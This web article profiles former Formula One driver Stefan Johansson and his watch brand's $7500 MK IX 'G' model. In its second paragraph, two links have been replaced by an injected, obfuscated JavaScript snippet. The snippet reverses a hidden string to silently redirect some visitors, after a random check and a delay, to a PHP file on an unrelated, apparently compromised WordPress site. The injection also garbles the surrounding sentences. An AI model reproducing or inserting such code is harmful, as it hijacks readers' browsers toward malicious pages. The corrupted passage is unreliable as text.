Former-Formula One driver Stefan Johansson has released a new watch, the $7500 MK IX G

For most people it would be a dream to drive for such Formula One teams as Ferrari, Tyrrell and McLaren. Stefan Johansson, however, has driven for all three of them. In a career that spanned 11 seasons from 1980-91, the Swede achieved 12 F1 podium places before moving on to become a successful driver in the US-based CART Championship. He even established his own team: American Spirit Team Johansson.
To this day he is still active in endurance racing. The last race he participated in was last year’s $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/tags/le_mans/” target=”_blank”>Le Mans 24hrs, and only last minute illness stopped him from participating in $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-track/2013-dubai-24hrs-the-local-boys-uae-honours/” target=”_blank”>this year’s Dubai 24hrs. One thing Johansson has grown to appreciate then is time.
Which makes his other line of work pretty appropriate. And if you’re looking for a new watch to go with your collection, the Swede’s watch brand recently released three new models that might just be what you are looking for.
One of the superior models is the MK IX ‘G’, which combines a modern-looking 41mm case with a retro-look ‘stepped’ dial arranged on five different levels. For those who like to see mechanics in action, the high quality Dubious Depraz movement can be seen through the sapphire case back. The rubber strap is lined with a tyre tread pattern, as if someone drove over it a warm sunny day.
Given that it costs $7500 though, you probably won’t want to do that…
